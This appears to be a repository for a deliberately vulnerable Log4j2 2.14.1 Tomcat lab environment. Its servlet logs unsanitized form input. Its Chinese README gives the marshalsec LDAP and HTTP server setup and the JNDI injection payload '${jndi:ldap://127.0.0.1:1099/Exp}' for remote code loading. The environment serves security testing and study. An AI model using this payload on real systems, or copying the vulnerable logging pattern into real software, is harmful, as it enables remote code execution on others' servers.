├── .gitignore
├── README.md
├── log4j_demo
    ├── log4j_demo.iml
    ├── out
    │   ├── artifacts
    │   │   ├── log4j_demo
    │   │   │   └── log4j_demo.war
    │   │   └── log4j_demo_war_exploded
    │   │   │   ├── WEB-INF
    │   │   │       ├── classes
    │   │   │       │   └── HelloServlet.class
    │   │   │       ├── lib
    │   │   │       │   ├── log4j-api-2.14.1.jar
    │   │   │       │   ├── log4j-core-2.14.1.jar
    │   │   │       │   └── servlet-api.jar
    │   │   │       └── web.xml
    │   │   │   └── index.jsp
    │   └── production
    │   │   └── log4j_demo
    │   │       └── HelloServlet.class
    ├── src
    │   └── HelloServlet.java
    └── web
    │   ├── WEB-INF
    │       ├── lib
    │       │   ├── log4j-api-2.14.1.jar
    │       │   ├── log4j-core-2.14.1.jar
    │       │   └── servlet-api.jar
    │       └── web.xml
    │   └── index.jsp
└── pic
    ├── image-20211210160538626.png
    └── image-20211210160816201.png


/.gitignore:
--------------------------------------------------------------------------------
 1 | .idea/
 2 | .DS_Store
 3 | 
 4 | # Binaries for programs and plugins
 5 | *.exe
 6 | *.exe~
 7 | *.dll
 8 | *.so
 9 | *.dylib
10 | 
11 | # Test binary, built with `go test -c`
12 | *.test
13 | _test
14 | _testmain.go
15 | 
16 | # Output of the go coverage tool, specifically when used with LiteIDE
17 | *.out
18 | 
19 | # Dependency directories (remove the comment below to include it)
20 | vendor/
21 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # log4j2 jndi tomcat 漏洞环境
 2 | 
 3 | ## 部署war包
 4 | 
 5 | ```
 6 | mv log4j_demo/out/artifacts/log4j_demo tomcat/webapps
 7 | ```
 8 | 
 9 | ## 基础操作
10 | 
11 | ```
12 | cd marshalsec
13 | 
14 | python3 -m http.server 8888
15 | 
16 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exp 1099
17 | ```
18 | 
19 | ## 测试
20 | 
21 | ```
22 | ${jndi:ldap://127.0.0.1:1099/Exp}
23 | ```
24 | 
25 | ![image-20211210160538626](pic/image-20211210160538626.png)
26 | 
27 | 
28 | 
29 | ![image-20211210160816201](pic/image-20211210160816201.png)


--------------------------------------------------------------------------------
/log4j_demo/log4j_demo.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module type="JAVA_MODULE" version="4">
 3 |   <component name="FacetManager">
 4 |     <facet type="web" name="Web">
 5 |       <configuration>
 6 |         <descriptors>
 7 |           <deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/web/WEB-INF/web.xml" />
 8 |         </descriptors>
 9 |         <webroots>
10 |           <root url="file://$MODULE_DIR$/web" relative="/" />
11 |         </webroots>
12 |       </configuration>
13 |     </facet>
14 |   </component>
15 |   <component name="NewModuleRootManager" inherit-compiler-output="true">
16 |     <exclude-output />
17 |     <content url="file://$MODULE_DIR$">
18 |       <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
19 |     </content>
20 |     <orderEntry type="inheritedJdk" />
21 |     <orderEntry type="sourceFolder" forTests="false" />
22 |     <orderEntry type="library" name="lib" level="project" />
23 |   </component>
24 | </module>


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo/log4j_demo.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo/log4j_demo.war


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/classes/HelloServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/classes/HelloServlet.class


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-api-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-api-2.14.1.jar


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-core-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-core-2.14.1.jar


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/servlet-api.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/servlet-api.jar


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
 5 |          version="4.0">
 6 | 
 7 |     <servlet>
 8 |         <servlet-name>hello</servlet-name>
 9 |         <servlet-class>HelloServlet</servlet-class>
10 |     </servlet>
11 |     <servlet-mapping>
12 |         <servlet-name>hello</servlet-name>
13 |         <url-pattern>/hello</url-pattern>
14 |     </servlet-mapping>
15 | 
16 | </web-app>


--------------------------------------------------------------------------------
/log4j_demo/out/artifacts/log4j_demo_war_exploded/index.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 2 | <html>
 3 |   <head>
 4 |     <title>Log4j Demo</title>
 5 |   </head>
 6 |   <body>
 7 |   Log
 8 |   <form action="hello" method="post">
 9 |     <input type="text" name="log" />
10 |     <input type="submit" value="Submit" />
11 |   </form>
12 |   </body>
13 | </html>
14 | 


--------------------------------------------------------------------------------
/log4j_demo/out/production/log4j_demo/HelloServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/out/production/log4j_demo/HelloServlet.class


--------------------------------------------------------------------------------
/log4j_demo/src/HelloServlet.java:
--------------------------------------------------------------------------------
 1 | import org.apache.logging.log4j.LogManager;
 2 | import org.apache.logging.log4j.Logger;
 3 | 
 4 | import javax.servlet.ServletException;
 5 | import javax.servlet.http.HttpServlet;
 6 | import javax.servlet.http.HttpServletRequest;
 7 | import javax.servlet.http.HttpServletResponse;
 8 | import java.io.IOException;
 9 | 
10 | public class HelloServlet extends HttpServlet {
11 | 
12 |     public static final Logger logger = LogManager.getLogger(HelloServlet.class);
13 | 
14 |     @Override
15 |     public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
16 |         resp.getWriter().println("doGet");
17 |     }
18 | 
19 |     @Override
20 |     protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
21 |         String log = req.getParameter("log");
22 |         logger.error(log);
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/log4j-api-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/log4j-api-2.14.1.jar


--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/log4j-core-2.14.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/log4j-core-2.14.1.jar


--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/lib/servlet-api.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/log4j_demo/web/WEB-INF/lib/servlet-api.jar


--------------------------------------------------------------------------------
/log4j_demo/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
 5 |          version="4.0">
 6 | 
 7 |     <servlet>
 8 |         <servlet-name>hello</servlet-name>
 9 |         <servlet-class>HelloServlet</servlet-class>
10 |     </servlet>
11 |     <servlet-mapping>
12 |         <servlet-name>hello</servlet-name>
13 |         <url-pattern>/hello</url-pattern>
14 |     </servlet-mapping>
15 | 
16 | </web-app>


--------------------------------------------------------------------------------
/log4j_demo/web/index.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 2 | <html>
 3 |   <head>
 4 |     <title>Log4j Demo</title>
 5 |   </head>
 6 |   <body>
 7 |   Log
 8 |   <form action="hello" method="post">
 9 |     <input type="text" name="log" />
10 |     <input type="submit" value="Submit" />
11 |   </form>
12 |   </body>
13 | </html>
14 | 


--------------------------------------------------------------------------------
/pic/image-20211210160538626.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/pic/image-20211210160538626.png


--------------------------------------------------------------------------------
/pic/image-20211210160816201.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jweny/log4j-vul-env/bdb1547cec1a4084ee33b6f1bd1121833ef50a3f/pic/image-20211210160816201.png


--------------------------------------------------------------------------------